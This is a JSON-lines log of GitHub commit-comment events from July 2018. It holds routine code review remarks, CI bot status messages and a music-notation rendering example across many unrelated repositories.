{"id":"7971007895","type":"CommitCommentEvent","actor":{"login":"cjpdee"},"repo":{"name":"cjpdee/Multiplayer"},"payload":{"comment":{"id":29721430,"position":212,"line":222,"path":"game.js","commit_id":"18c8857a686f86f1ce37341751c10acdae449c55","created_at":"2018-07-16T14:24:34Z","updated_at":"2018-07-16T14:24:34Z","author_association":"OWNER","body":"This will be developed further in future, for now it just checks if the player is in a certain position but in future this will correspond with other components on the screen"}},"created_at":"2018-07-16T14:24:34Z"}
{"id":"7971008669","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29721432,"position":4,"line":166,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T14:24:41Z","updated_at":"2018-07-16T14:24:41Z","author_association":"NONE","body":"I was adding a \"random\" version number (the one I have) - is there a way to find out what would be the least required?"}},"created_at":"2018-07-16T14:24:41Z"}
{"id":"7971011138","type":"CommitCommentEvent","actor":{"login":"vpdeva"},"repo":{"name":"vpdeva/untitled2"},"payload":{"comment":{"id":29721435,"position":76,"line":379,"path":"public/index.html","commit_id":"7efb38f8677d783316cc1672e911f02077dbc393","created_at":"2018-07-16T14:25:05Z","updated_at":"2018-07-16T14:25:05Z","author_association":"OWNER","body":"Blockchaingers club mate. Not blockchainers.. lol"}},"created_at":"2018-07-16T14:25:05Z"}
{"id":"7971012753","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"plone/Products.CMFPlone"},"payload":{"comment":{"id":29721438,"position":null,"line":null,"path":null,"commit_id":"0909383eb2bbc8d31794a7dbf4392eec6236be22","created_at":"2018-07-16T14:25:19Z","updated_at":"2018-07-16T14:25:19Z","author_association":"MEMBER","body":"Sorry about that.\r\nI haven't used sorting on multiple columns, and the Plone UI does not support it on the search page. But I can imagine code that uses this.  Do you get errors in a public add-on or in own custom code?\r\n\r\nCan you open an issue for this? I can't promise I can work on this, and certainly not soon."}},"created_at":"2018-07-16T14:25:19Z"}
{"id":"7971013149","type":"CommitCommentEvent","actor":{"login":"hectorcorrea"},"repo":{"name":"Brown-University-Library/bul-search"},"payload":{"comment":{"id":29721439,"position":8,"line":94,"path":"app/assets/javascripts/catalog_results_availability.js","commit_id":"fd28cf4fda414566c1f1519bf413137ef2ef5b02","created_at":"2018-07-16T14:25:23Z","updated_at":"2018-07-16T14:25:23Z","author_association":"MEMBER","body":"check for status in addition to location"}},"created_at":"2018-07-16T14:25:23Z"}
{"id":"7971013424","type":"CommitCommentEvent","actor":{"login":"sadatnfs"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29721441,"position":null,"line":null,"path":null,"commit_id":"03ab64c3a68f3b990bf690ede06e3066ad4e35a0","created_at":"2018-07-16T14:25:25Z","updated_at":"2018-07-16T14:25:25Z","author_association":"NONE","body":"What's your call and error that you're getting?"}},"created_at":"2018-07-16T14:25:25Z"}
{"id":"7971037937","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29721492,"position":null,"line":null,"path":null,"commit_id":"f34343b520c5306793440ccbb188fe59794b0b99","created_at":"2018-07-16T14:29:10Z","updated_at":"2018-07-16T14:29:10Z","author_association":"CONTRIBUTOR","body":"Example:\r\n\r\n```\r\n!!!OMD: [quarter] = 120\r\n**kern\r\n*M4/4\r\n=1\r\n1c\r\n=2\r\n1g\r\n==\r\n*-\r\n```\r\n\r\nrenders as:\r\n\r\n<img width=\"544\" alt=\"screen shot 2018-07-16 at 4 27 27 pm\" src=\"https://user-images.githubusercontent.com/3487289/42764118-0ce8984e-8915-11e8-896b-4080ae27b3c9.png\">\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-16T16:27:50\" version=\"2.0.0-dev-186ffb4-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n        <extMeta>\r\n            <frames xmlns:humxml=\"http://www.humdrum.org/ns/humxml\">\r\n                <metaFrame n=\"0\" token=\"!!!OMD: [quarter] = 120\" xml:id=\"loc0\">\r\n                    <frameInfo>\r\n                        <startTime float=\"0\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>OMD</referenceKey>\r\n                        <referenceValue>[quarter] = 120</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n            </frames>\r\n        </extMeta>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001117725976\">\r\n                <score xml:id=\"score-0000001581018323\">\r\n                    <scoreDef xml:id=\"scoredef-0000000127584126\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000806869721\">\r\n                            <staffDef xml:id=\"staffdef-0000000475104936\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"4\" meter.unit=\"4\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000501663912\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L2F1\">\r\n                        <measure xml:id=\"measure-L4\" n=\"1\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L5F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <tempo xml:id=\"tempo-L1F1\" staff=\"1\" tstamp=\"1.000000\">♩ = 120</tempo>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L6\" right=\"end\" n=\"2\">\r\n                            <staff xml:id=\"staff-L6F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L6F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F1\" dur=\"1\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nAllows: `[quarter]` `[quarter-dot]` `[eighth]` and `[eighth-dot]` to be converted to graphical notes.  Other rhythmic values are not yet available.\r\n"}},"created_at":"2018-07-16T14:29:10Z"}
{"id":"7971039306","type":"CommitCommentEvent","actor":{"login":"deangray82"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29721497,"position":39,"line":39,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T14:29:23Z","updated_at":"2018-07-16T14:29:23Z","author_association":"NONE","body":"`$value` doesn't need to be passed by reference."}},"created_at":"2018-07-16T14:29:23Z"}
{"id":"7971040400","type":"CommitCommentEvent","actor":{"login":"ousseynouseck"},"repo":{"name":"ashutoshdev/GoogleEarthbyKML"},"payload":{"comment":{"id":29721501,"position":null,"line":null,"path":null,"commit_id":"b1cc316bd7795000c4aadb6398a0ce861517725f","created_at":"2018-07-16T14:29:32Z","updated_at":"2018-07-16T14:29:32Z","author_association":"NONE","body":"bonjour j'aurai besoin de l'api de google earth "}},"created_at":"2018-07-16T14:29:32Z"}
{"id":"7971045427","type":"CommitCommentEvent","actor":{"login":"svmnotn"},"repo":{"name":"Karlinator/roll20-character-sheets"},"payload":{"comment":{"id":29721512,"position":7,"line":44,"path":"Stars_Without_Number_Revised/ReadMe.md","commit_id":"ab42279b89d1033c9c59ac924a7a275d7175a8b1","created_at":"2018-07-16T14:30:19Z","updated_at":"2018-07-16T14:30:19Z","author_association":"NONE","body":"armor, not weapons"}},"created_at":"2018-07-16T14:30:19Z"}
{"id":"7971045977","type":"CommitCommentEvent","actor":{"login":"deangray82"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29721515,"position":58,"line":58,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T14:30:24Z","updated_at":"2018-07-16T14:30:24Z","author_association":"NONE","body":"Same here don't pass by reference. `foreach($data as $value) {`"}},"created_at":"2018-07-16T14:30:24Z"}
{"id":"7971051098","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29721525,"position":null,"line":null,"path":null,"commit_id":"ba10a6bb4ce7a9bb6add4c2a23e221d0612ff29a","created_at":"2018-07-16T14:31:11Z","updated_at":"2018-07-16T14:31:11Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.v1.json#\nErrors:\n  * data should NOT have additional properties: \"metadata\"\n  * data.tasks should be array\n\n</details>"}},"created_at":"2018-07-16T14:31:11Z"}
{"id":"7971058491","type":"CommitCommentEvent","actor":{"login":"mseaton"},"repo":{"name":"PIH/openmrs-module-pihmalawi"},"payload":{"comment":{"id":29721549,"position":26,"line":75,"path":"omod/src/main/webapp/resources/htmlforms/chf_visit.xml","commit_id":"6cb02904242d180033829216d6b7de9a7b2592d8","created_at":"2018-07-16T14:32:22Z","updated_at":"2018-07-16T14:32:22Z","author_association":"MEMBER","body":"@tlimbani and @cioan I would try to get in the practice of using uuids over concept ids for both new and existing.  We have some existing bad practice of using concept ids, but let's try to not perpetuate that.  Let's use concept uuids throughout."}},"created_at":"2018-07-16T14:32:22Z"}
{"id":"7971059636","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721554,"position":5,"line":38,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:32:32Z","updated_at":"2018-07-16T14:32:32Z","author_association":"CONTRIBUTOR","body":"@MartianLee 왜 index가 아닌 list일까요? http://guides.rubyonrails.org/routing.html#crud-verbs-and-actions"}},"created_at":"2018-07-16T14:32:32Z"}
{"id":"7971060887","type":"CommitCommentEvent","actor":{"login":"purerosefallen"},"repo":{"name":"Khriskh/srvpro"},"payload":{"comment":{"id":29721561,"position":null,"line":null,"path":null,"commit_id":"eb68e726dd6442ab207fc4ea220224241bec7326","created_at":"2018-07-16T14:32:45Z","updated_at":"2018-07-16T14:32:45Z","author_association":"NONE","body":"You didn't do the part allowing players to create those rooms."}},"created_at":"2018-07-16T14:32:45Z"}
{"id":"7971061772","type":"CommitCommentEvent","actor":{"login":"WebForzaM"},"repo":{"name":"WebForzaM/hello-world"},"payload":{"comment":{"id":29721565,"position":null,"line":null,"path":null,"commit_id":"c2568bc440b9333d2927e086332b4039353d5cc7","created_at":"2018-07-16T14:32:53Z","updated_at":"2018-07-16T14:32:53Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-16T14:32:53Z"}
{"id":"7971064044","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"hvanderheide/aports"},"payload":{"comment":{"id":29721571,"position":17,"line":17,"path":"testing/frr/frr-init","commit_id":"d7c6eb15178a67f30b6180b4670aba35f610f412","created_at":"2018-07-16T14:33:16Z","updated_at":"2018-07-16T14:33:16Z","author_association":"NONE","body":"should be status, right (not statui)?"}},"created_at":"2018-07-16T14:33:16Z"}
{"id":"7971066558","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721580,"position":21,"line":54,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:33:40Z","updated_at":"2018-07-16T14:33:40Z","author_association":"CONTRIBUTOR","body":"@MartianLee 이것도 변칙적인 패턴이네요. 어떤 이유인지 궁금합니다."}},"created_at":"2018-07-16T14:33:40Z"}
{"id":"7971066963","type":"CommitCommentEvent","actor":{"login":"jcchavezs"},"repo":{"name":"jcchavezs/zipkin-php"},"payload":{"comment":{"id":29721582,"position":34,"line":131,"path":"tests/Integration/Reporters/Http/CurlFactoryTest.php","commit_id":"08bd91f82cc667fedaecd7c0a5f500ae2400e61f","created_at":"2018-07-16T14:33:44Z","updated_at":"2018-07-16T14:33:44Z","author_association":"OWNER","body":"I believe it does as test is passing."}},"created_at":"2018-07-16T14:33:44Z"}
{"id":"7971067297","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29721584,"position":null,"line":null,"path":null,"commit_id":"ec03ee0d260c0f4255f07a3c9cd575def4e644ee","created_at":"2018-07-16T14:33:47Z","updated_at":"2018-07-16T14:33:47Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-73](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-73).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-73-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T14:33:47Z"}
{"id":"7971073387","type":"CommitCommentEvent","actor":{"login":"mol-teamcity"},"repo":{"name":"MailOnline/mol-conventional-changelog"},"payload":{"comment":{"id":29721595,"position":null,"line":null,"path":null,"commit_id":"f79ea4cd0255a820d27365e55848ebe715cdc801","created_at":"2018-07-16T14:34:45Z","updated_at":"2018-07-16T14:34:45Z","author_association":"NONE","body":"Build version: __`0.0.0-semantically-released-greenkeeper/initial.56`__ :crossed_fingers: [`greenkeeper/initial`](https://github.com/MailOnline/mol-conventional-changelog/tree/greenkeeper/initial) on [*Travis*](https://travis-ci.org/MailOnline/mol-conventional-changelog/builds/404472238) :tada:"}},"created_at":"2018-07-16T14:34:45Z"}
{"id":"7971074455","type":"CommitCommentEvent","actor":{"login":"SergeyRabtsau"},"repo":{"name":"victoria-kostyukova/ggrc-core"},"payload":{"comment":{"id":29721597,"position":null,"line":null,"path":null,"commit_id":"567d96050ad507821849f95d618ad8cfa375a520","created_at":"2018-07-16T14:34:56Z","updated_at":"2018-07-16T14:34:56Z","author_association":"NONE","body":"@victoria-kostyukova selenium changes look good."}},"created_at":"2018-07-16T14:34:56Z"}
{"id":"7971076466","type":"CommitCommentEvent","actor":{"login":"ajones-rvbd"},"repo":{"name":"hvanderheide/aports"},"payload":{"comment":{"id":29721604,"position":null,"line":null,"path":null,"commit_id":"d7c6eb15178a67f30b6180b4670aba35f610f412","created_at":"2018-07-16T14:35:17Z","updated_at":"2018-07-16T14:35:17Z","author_association":"NONE","body":"Thanks for this, I'll update the PR.  What happens when we just use frr in openrc (no wrapper)?  I only tested on docker, so I didn't see an error.  I'll try setting up a VM to test, then I'll push out the update..."}},"created_at":"2018-07-16T14:35:17Z"}
{"id":"7971077271","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721605,"position":8,"line":41,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:35:25Z","updated_at":"2018-07-16T14:35:25Z","author_association":"CONTRIBUTOR","body":"정확한 닉네임이나 이메일이 아닌 일부 매칭을 찾을 수 있게 하는건 어떤가요?"}},"created_at":"2018-07-16T14:35:25Z"}
{"id":"7971080001","type":"CommitCommentEvent","actor":{"login":"deangray82"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29721608,"position":135,"line":135,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T14:35:52Z","updated_at":"2018-07-16T14:35:52Z","author_association":"NONE","body":"You also need the `floor()` function. e.g. floor(count($data)/2);"}},"created_at":"2018-07-16T14:35:52Z"}
{"id":"7971084499","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721615,"position":null,"line":null,"path":null,"commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:36:32Z","updated_at":"2018-07-16T14:36:32Z","author_association":"CONTRIBUTOR","body":"제안인데요. 요것 롤백하고 저랑 같이 페어 해보면 어떨까 하네요. 서로 배울 점이 있을 듯합니다."}},"created_at":"2018-07-16T14:36:32Z"}
{"id":"7971084610","type":"CommitCommentEvent","actor":{"login":"lllBarcodeslll"},"repo":{"name":"meganz/sdk"},"payload":{"comment":{"id":29721616,"position":5,"line":148,"path":"bindings/ios/MEGARequest.mm","commit_id":"6592001f810afa03087e4dd3c5661d1332880f8c","created_at":"2018-07-16T14:36:33Z","updated_at":"2018-07-16T14:36:33Z","author_association":"NONE","body":"Eval/Run/pipenV"}},"created_at":"2018-07-16T14:36:33Z"}
{"id":"7971095238","type":"CommitCommentEvent","actor":{"login":"zachmullen"},"repo":{"name":"QuadmasterXLII/ImageInpainting"},"payload":{"comment":{"id":29721652,"position":4,"line":18,"path":"demo.py","commit_id":"42dab0d0249c2f0daa94052b67de9e8d932018cc","created_at":"2018-07-16T14:38:15Z","updated_at":"2018-07-16T14:38:15Z","author_association":"COLLABORATOR","body":"Why move this outside the loop? If we're still encoding the mask in the image itself, don't we need to re-read it inside the loop?"}},"created_at":"2018-07-16T14:38:15Z"}
{"id":"7971098854","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29721667,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-16T14:38:50Z","updated_at":"2018-07-16T14:38:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T14:38:50Z"}
{"id":"7971102758","type":"CommitCommentEvent","actor":{"login":"ethynyk"},"repo":{"name":"ethynyk/tiny4412_audiohal"},"payload":{"comment":{"id":29721674,"position":null,"line":null,"path":null,"commit_id":"a6fd6b31cc15e59490244fae58a9fd54b9f74fa9","created_at":"2018-07-16T14:39:27Z","updated_at":"2018-07-16T14:39:27Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-16T14:39:27Z"}
{"id":"7971104456","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721678,"position":27,"line":77,"path":"routes/user/routes_user.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:39:41Z","updated_at":"2018-07-16T14:39:41Z","author_association":"MEMBER","body":"`array` -> `object` \r\n`/user/userinfo` 가 응답으로 주는 데이터에 있는 `userinfo` 속성은 배열이 아니라 객체임."}},"created_at":"2018-07-16T14:39:41Z"}
{"id":"7971105102","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29721681,"position":null,"line":null,"path":null,"commit_id":"8fb5a302585c1db30224edece80336a5346a4500","created_at":"2018-07-16T14:39:46Z","updated_at":"2018-07-16T14:39:46Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.v1.json#\nErrors:\n  * data.tasks should be array\n\n</details>"}},"created_at":"2018-07-16T14:39:46Z"}
{"id":"7971105928","type":"CommitCommentEvent","actor":{"login":"michael-lucas-net"},"repo":{"name":"derMacon/PS2Klausurvorbereitung"},"payload":{"comment":{"id":29721682,"position":null,"line":null,"path":null,"commit_id":"e2da1007e29e398edb9e6b7a615bc16296f2a8af","created_at":"2018-07-16T14:39:53Z","updated_at":"2018-07-16T14:39:53Z","author_association":"COLLABORATOR","body":"Wieso tryst und catchst du das mit einer Nullpointer exc., obwohl du ganz oben schon ein if hast, das das abfängt?"}},"created_at":"2018-07-16T14:39:53Z"}
{"id":"7971106606","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721684,"position":28,"line":78,"path":"routes/user/routes_user.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:39:58Z","updated_at":"2018-07-16T14:39:58Z","author_association":"MEMBER","body":"`\"사용자 데이터 배열\"` -> `\"사용자 데이터 객체\"`"}},"created_at":"2018-07-16T14:39:58Z"}
{"id":"7971109387","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29721692,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-16T14:40:21Z","updated_at":"2018-07-16T14:40:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T14:40:21Z"}
{"id":"7971112605","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29721698,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-16T14:40:48Z","updated_at":"2018-07-16T14:40:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T14:40:48Z"}
{"id":"7971113486","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721699,"position":29,"line":79,"path":"routes/user/routes_user.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:40:56Z","updated_at":"2018-07-16T14:40:56Z","author_association":"MEMBER","body":"`items:` -> `properties:`\r\n배열이 아니고 객체이므로, 바로 `properties:` 나오면 됨."}},"created_at":"2018-07-16T14:40:56Z"}
{"id":"7971114918","type":"CommitCommentEvent","actor":{"login":"lambdageek"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29721704,"position":30,"line":132,"path":"mcs/class/corlib/System.Runtime.InteropServices/Marshal.cs","commit_id":"18b6846a3a2218525b7335a1f0515de93a1e44ca","created_at":"2018-07-16T14:41:10Z","updated_at":"2018-07-16T14:41:10Z","author_association":"MEMBER","body":"@jaykrell We missed an infinite loop "}},"created_at":"2018-07-16T14:41:10Z"}
{"id":"7971115083","type":"CommitCommentEvent","actor":{"login":"kanaka"},"repo":{"name":"kanaka/mal"},"payload":{"comment":{"id":29721705,"position":null,"line":null,"path":null,"commit_id":"699f0ad23aca21076edb6a51838d879ca580ffd5","created_at":"2018-07-16T14:41:11Z","updated_at":"2018-07-16T14:41:11Z","author_association":"OWNER","body":"Hah! Nice catch. The run-fn-for function was originally name run-fn and was hard-coded to run for 3 seconds. I forgot to replace the 3 with the max-secs variable. However, given that some implementations have less than 1 iteration per second, I'm just going to drop that division and report the iterations per max-seconds so that for the slowest implementations we have some relative comparison instead of all of them just reporting 0. https://github.com/kanaka/mal/commit/6da59ec2f48bdebabee68a2029877b8a7218edfe\r\n\r\nOn the plus side, the actual number was also meaningless except as a rough relative comparison between implementations. Also, the perf* benchmarks are microbenchmarks and not particularly good ones either. So please take them with a huge grain of salt!\r\n\r\n"}},"created_at":"2018-07-16T14:41:11Z"}
{"id":"7971116420","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721709,"position":31,"line":81,"path":"routes/user/routes_user.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:41:24Z","updated_at":"2018-07-16T14:41:24Z","author_association":"MEMBER","body":"위 두줄은 생략하면 됨."}},"created_at":"2018-07-16T14:41:24Z"}
{"id":"7971117820","type":"CommitCommentEvent","actor":{"login":"kanaka"},"repo":{"name":"kanaka/mal"},"payload":{"comment":{"id":29721711,"position":23,"line":27,"path":"perf.mal","commit_id":"699f0ad23aca21076edb6a51838d879ca580ffd5","created_at":"2018-07-16T14:41:37Z","updated_at":"2018-07-16T14:41:37Z","author_association":"OWNER","body":"Hah! Nice catch. The run-fn-for function was originally name run-fn and was hard-coded to run for 3 seconds. I forgot to replace the 3 with the max-secs variable. However, given that some implementations have less than 1 iteration per second, I'm just going to drop that division and report the iterations per max-seconds so that for the slowest implementations we have some relative comparison instead of all of them just reporting 0. 6da59ec\r\n\r\nOn the plus side, the actual number was also meaningless except as a rough relative comparison between implementations. Also, the perf* benchmarks are microbenchmarks and not particularly good ones either. So please take them with a huge grain of salt!"}},"created_at":"2018-07-16T14:41:37Z"}
{"id":"7971118289","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29721712,"position":62,"line":45,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T14:41:41Z","updated_at":"2018-07-16T14:41:41Z","author_association":"OWNER","body":"But `procesPayment` needs to be sent from the exchange address, or else it will be rejected.\r\nI could store in the contract the hash from the exchange password and then request the exchange to submit the password and I can hash it on the function `processPayment` and then validate that it is the value is what I am expecting. It would be a bit more secure because the password is stored as a hashed value in the contract in the meantime, but then again it is more costly in terms of gas. And in the end the password will have to be passed anyway as an argument when executing `processPayment`.  Therefore ,  sooner or later the password is going to be public. So I decided to ditch the hash out the flow and save some gas.\r\n\r\n"}},"created_at":"2018-07-16T14:41:41Z"}
{"id":"7971120297","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721719,"position":19,"line":69,"path":"routes/user/routes_user.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:41:59Z","updated_at":"2018-07-16T14:41:59Z","author_association":"MEMBER","body":"뒤에 따옴표 닫히지 않음."}},"created_at":"2018-07-16T14:41:59Z"}
{"id":"7971121651","type":"CommitCommentEvent","actor":{"login":"phantasm66"},"repo":{"name":"ezcater/devtools"},"payload":{"comment":{"id":29721721,"position":2,"line":1,"path":"Dockerfile","commit_id":"c59b757f92348961e97b25587a0619326f6fb76a","created_at":"2018-07-16T14:42:12Z","updated_at":"2018-07-16T14:42:12Z","author_association":"CONTRIBUTOR","body":"You probably want to change this to production jfrog, since we’re single pipeline now (and it’s production Jenkins)"}},"created_at":"2018-07-16T14:42:12Z"}
